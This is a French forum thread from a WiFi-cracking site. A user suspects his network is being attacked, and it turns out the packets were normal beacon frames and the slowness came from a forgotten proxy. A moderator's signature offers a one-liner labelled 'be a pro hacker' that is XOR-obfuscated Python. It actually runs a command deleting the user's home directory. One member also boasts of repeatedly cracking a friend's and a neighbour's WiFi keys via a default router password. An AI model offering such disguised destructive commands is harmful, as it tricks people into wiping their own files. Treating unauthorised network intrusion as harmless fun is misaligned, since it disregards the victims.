Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 08-12-2011 14:24:12

Zectron
Nouveau membre

Je suis attaqué !!!! help pour se défendre...

Salut les gas...peut être aussi quelques nana...

En regardant mon réseaux wifi avec kismac, a cause de ma connexion sans problème en ethernet, et une connexion à mourir la gueule ouverte en wifi...Et bien je me suis rendu compte que des millier de packet son arraché à mon réseaux toute les minute !!

Alors voila, en changeant mon mot de passe wifi cela continue, alors je soupçonne un voisin, (ou les servisse secret) de chercher à cassé ma clé wifi...

Que faire ? cela dure...A chaque fois que je remet mon wifi en route, ca recommence ! Et il est impossible de changer mon adresse BSSID sur ma box, donc je peux meme pas verifier si je peux être tranquille quelque minute. Obliger de couper le wifi ce qui me fais vraiment râler.

Peut être quelqu'un à une idée de ce que je pourrais faire ? Peut être une piste piste pour une contre attaque ?? Un moyen de me proteger, j'en ai besoin...

Merci de votre aide

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 08-12-2011 14:55:29

antares145
Membre d'honneur
Site Web

Re : Je suis attaqué !!!! help pour se défendre...

La première chose à faire c'est de ne pas poster ton message en double, c'est mal vu ici... Je supprime la copie, mais fais attention  l'avenir.

Alors voila, en changeant mon mot de passe wifi cela continue, alors je soupçonne un voisin, (ou les servisse secret) de chercher à cassé ma clé wifi...

Je vois vraiment pas pourquoi les services secrets s'amuseraient à ça : s'ils avaient une bonne raison de le faire tu ne serais sûrement pas en WEP big_smile

Et il est impossible de changer mon adresse BSSID sur ma box

Je ne vois pas ce que ça changerait de modifier ton BSSID, mais c'est assez rare comme option sur les box grand-public...

Il y a une solution toute simple : tu passes en WPA avec une clé sérieuse (genre pas le nom de ton chien). Tu prends une clé aléatoire de 10 caractères (comme celle-ci : [email protected]<") et ton réseau sera inviolable (ne pratique).

Accessoirement, je penche pour un faux positif, un appareil chez toi qui a le droit de se connecter au réseau (décodeur TV, console de jeu) et auquel tu ne penses pas roll

#3 08-12-2011 15:07:48

yasmine
Membre Indispensable

Ce post m a fait rigoler, parce qu il me fait souvenir, de mon voisin, à qui j ai défié de lui toujours trouver (cracker) sa clé wifi. ...(wep, wpa, ...)

Simple: il n a jamais eu le reflexe de changer son password routeur , et puis, j ai mis un chti dynd....

OK, je sors

#4 08-12-2011 15:23:55

Zectron
Nouveau membre

Merci d'avoir supprimé mon doublon ! Je desesperé de le voire dans la liste des post...

D'abord, merci de ta réponse,

En faite je pensé à changé le BSSID pour vérifié si je suis bien attaqué ,  c'est bien par le BSSID qu'on identifie un réseaux pour l'attaquer ? 
En changeant le BSSID j'esperé que l'attaque s'arrete, puisque le programme qui récolte les packet n'a plus ou se connecter... Jusqu'à que l'utilisateur vienne chercher un nouveau réseau à attaquer, non ??

Je suis intimement persuadé que je n'est rien de connecté en wifi, j'ai bien une box tv, mais elle fonctionne avec un cable pas avec le wifi, mais bon c'est on jamais, je vais regarder ca.

Une question tres tres bete : Lorsque que j'injecte des paquets sur un réseau pour casser la clé, alors que je n'est pas encore trouvé la clé, cela ce voie ? Parce que c'est ce que j'ai le sentiment de voir sur mon wifi...

#5 08-12-2011 15:33:15

antares145
Membre d'honneur
Site Web

Je suis intimement persuadé que je n'est rien de connecté en wifi

Quel est l'intérêt de garder ton WiFi activé alors ? tongue

En changeant le BSSID j'esperé que l'attaque s'arrete, puisque le programme qui récolte les packet n'a plus ou se connecter... Jusqu'à que l'utilisateur vienne chercher un nouveau réseau à attaquer, non ??

Oui, ça peut interrompre une attaque en cours, mais comme je te le disais c'est très rare comme option. Accessoirement, si tu désactives le WiFi pendant 2 jours et que tu le réactives après, l'attaquant (s'il y a un attaquant) doit relancer son attaque manuellement...

Une question tres tres bete : Lorsque que j'injecte des paquets sur un réseau pour casser la clé, alors que je n'est pas encore trouvé la clé, cela ce voie ? Parce que c'est ce que j'ai le sentiment de voir sur mon wifi...

Oui, c'est d'ailleurs généralement à ça qu'on voit qu'il y a une attaque en cours, mais c'est rare que ça perturbe carrément le réseau.

Je t'ai donné la solution : tu passes en WPA et basta. Les attaques d'injection ne fonctionnent pas en WPA, donc il ne pourra plus attaquer ton réseau : problème réglé ! wink

je déplace ton sujet, qui n'a rien à voir avec un botnet...

#6 08-12-2011 15:41:38

Zectron
Nouveau membre

Ok, bon, mais je suis en WPA !, si une attaque par injection est impossible, alors c'est autre chose, ou les servisses secret tongue

Bon je vais chercher un peu plus ce qui se passe, je te remercie encore pour tes réponses,  je vais bien finir par trouvé d'ou ca vien...

#7 08-12-2011 15:45:27

Jack Sparrow
Membre Indéboulonnable

Salut Zectron!

antares145 a écrit :

Accessoirement, je penche pour un faux positif, un appareil chez toi qui a le droit de se connecter au réseau (décodeur TV, console de jeu) et auquel tu ne penses pas roll

+1

Ton réseau est-il protégé par du WEP ou du WPA ?? Le WPA est assez long et difficile à cracker pour un peu que tu ais mis une clé un minimum sérieuse... Donc si l'appareil revient "vite" malgré cela ça doit être un de tes appareils à toi..
Si ton réseau est sécurisé avec du WEP, et cela semble être le cas d'après les post d'antares, c'est une autre histoire..

Zectron a écrit :

Il existe un logiciel qui te permette de détecter les intrusions oui, il s'apelle OpenWIPS-ng, on en parle sur ce topic et tu peux le trouver sur le site officiel de la team aircrack. wink

Dernière modification par Jack Sparrow (08-12-2011 15:46:26)

#8 08-12-2011 18:10:26

Zectron
Nouveau membre

Ah ouai, la je sèche, 

J'ai FF:FF:FF:FF:FF:FF qui reçois le meme nombre de paket que ceux émis par ma box !
Je suis bien en WPA et exit un quelconque appareille brancher sur mon réseau puisque j'ai changé peut être 20 fois le code WPA sans jamais le mettre dans aucun de mes appareille.

La soit un malin me casse les bonbon soit le wifi à des secret que je ne connait pas, soit je suis ataqué par des marsiens (pour changé des servisse secret)

#9 08-12-2011 18:22:50

antares145
Membre d'honneur
Site Web

La soit un malin me casse les bonbon soit le wifi à des secret que je ne connait pas, soit je suis ataqué par des marsiens (pour changé des servisse secret)

La réponse B Jean-Pierre, c'est mon dernier mot !
- si tu es en WPA et que tu as changé ta clé plusieurs fois, il n'y a aucune chance pour qu'un hypothétique attaquant arrive à casser la sécurité et donc encore moins pour qu'il puisse perturber ton réseau
- les martiens n'ont pas le WiFi et les services secrets n'ont rien à faire avec le réseau d'un particulier (au risque de briser le mythe du complot)

Au passage, FF:FF:FF:FF:FF:FF est l'adresse de broadcast, ce n'est pas une machine mais l'adresse à laquelle on envoie les paquets quand on veut que tout le monde les reçoive...
Pour ma part j'estime que le problème est résolu et qu'il n'y a pas d'attaque, à moins que tu nous envoies un fichier de capture Wireshark qui montre quels sont les paquets qui te posent problème (si c'est les beacon je me marre !) smile

#10 08-12-2011 19:13:46

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

il est aussi possible qu'un logiciel occupe ta bande passante.

1310812721.gif

#11 08-12-2011 19:17:51

yasmine
Membre Indispensable

antares145 a écrit :

- si tu es en WPA et que tu as changé ta clé plusieurs fois, il n'y a aucune chance pour qu'un hypothétique attaquant arrive à casser la sécurité et donc encore moins pour qu'il puisse perturber ton réseau

Et SI il n a pas changé son mot de passe par défault de son routeur, et que quelqu'un (un voisin meme lointain et bien équipé lui a mis, un petit dy*dn*, ) ???

Moi j'avais fait ca à un ami, il est devenu fou !
Il mettait et changeait  wep, wpa, .....et moi, comme une magicienne, je lui trouvais sa clé wifi

Dernière modification par yasmine (08-12-2011 19:19:35)

#12 08-12-2011 19:19:31

Zectron
Nouveau membre

Ouai tu doit avoir raison...une crise de paranoia herziene...

Wireshark j'y comprend absolument rien, je suis incapable de le faire parler... j'ai des truc SSDP je sais pas trop quoi, mais rien qui va à la vitesse de ce que je voie avec kismac, en attendent il m'est impossible de naviguer normalement avec mon wifi, les page mettent une année lumiere à s'afficher, et tout va bien en ethernet.
Mais bon cela vien peut être d'autre chose...

Merci pour vos réponse ! je laisserai un commentaire si je trouve d'ou ca vien...
Merci !

#13 09-12-2011 06:36:56

coyotus
Membre Irremplaçable
Lieu : fort fort lointain

c'est quoi ton modèle de carte wifi ?

1310812721.gif

#14 09-12-2011 11:43:30

spawn
Modérateur

Mais...

Quel est le problème ?
Des paquets sur un réseau, c'est normal

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#15 10-12-2011 17:10:20

Zectron
Nouveau membre

Ok, j'espere que vous êtes chaud pour une crise de fourir incontrôlé !??

Bon allé jme lance...Je sais pas si je peux, bon allé...

1) Les paquets qui me fesais telment flipé etait les beacon (antares epargne moi stp) faute à kissmac, franchement j'ai pas fait expres, mais j'ai apris à utiliser wireshark positif non ?  neutral

2) Certainement beaucoup plus drôle, enfin tout depend de la façon dont on voie la chose, mon wifi était inutilisable ou très lent à cause de....attention....... j'avais oublié de desactivé un proxy

Franchement la, y'a pas de smillé qui décrit la honte que je porte, et que je porterais jusqu'à la fin de la technologie wifi.

Ainsi, chers membres, chers admin, chers moderateur, chers D... de l'internet, du wifi et des proxy, qui ont tenté de me venir en aide, je vous prie de recevoir mes excuses les plus vives, et d'oublié ce poste ou alors, de l'épingler en exemple, pour que jamais, non, plus jamais persone n'ouvre un poste qui resemble, de pres ou de loin, à celui ci.

Bien à vous...
Zectron

Dernière modification par Zectron (10-12-2011 17:12:50)

#16 10-12-2011 17:16:28

M1ck3y
Administrateur
Lieu : Lost in the darkness

lol

#17 10-12-2011 17:18:19

koala
Membre d'honneur
Lieu : In the sky

Yeah bigsmoke

#18 10-12-2011 17:27:57

yasmine
Membre Indispensable

Et dire qu'à cause de son souci, (ce post), j'ai grillé mon steak !

mad:mad:

#19 10-12-2011 17:39:58

Zectron
Nouveau membre

Yasmin, vraiment jsuis confus... Mais la viande bien cuite moi j'aime bien ! Bon désolé...

#20 10-12-2011 18:36:28

kcdtv
Membre d'honneur
Lieu : Internacionaluña

je vous prie de recevoir mes excuses les plus vives, et d'oublié ce poste ou alors, de l'épingler en exemple, pour que jamais, non, plus jamais persone n'ouvre un poste qui resemble, de pres ou de loin, à celui ci.

Bien à vous...
Zectron

Pourquoi? On se marre bien...

Et dire qu'à cause de son souci, (ce post), j'ai grillé mon steak !

Go vegan!:yeahanim:
Je rigole, vive le couscous avec des côtes d'agneau, des merguez, et tout le reste..

#21 10-12-2011 18:40:49

antares145
Membre d'honneur
Site Web

antares145 a écrit :

Pour ma part j'estime que le problème est résolu et qu'il n'y a pas d'attaque, à moins que tu nous envoies un fichier de capture Wireshark qui montre quels sont les paquets qui te posent problème (si c'est les beacon je me marre !) smile

Zectron a écrit :

Les paquets qui me fesais telment flipé etait les beacon (antares epargne moi stp)

Mmmfffmouhahaha là non je regrette, mais ça c'est au delà de mes forces lol

nelson-haha.gif

boulet

Bon, ben au moins t'auras appris quelque chose et tu auras apporté un peu de gaieté dans ce monde de brutes smile

#22 11-12-2011 16:35:09

freekiss
Membre Indéboulonnable
Lieu : Belgique

J'ai tous lu et j'avoue que c'étais bien marrant, services secrets, etc......Au pire tu faisais un filtrage mac et test avec wireshark mais on va pas s'etendre vu que tout est clos.

Merci pour ce moment de bonheur,

Rien que le titre ma fait flippé, wink

Cordialement,

Si j'étais un crapaud, je serais un backtractien, smile

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.032 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]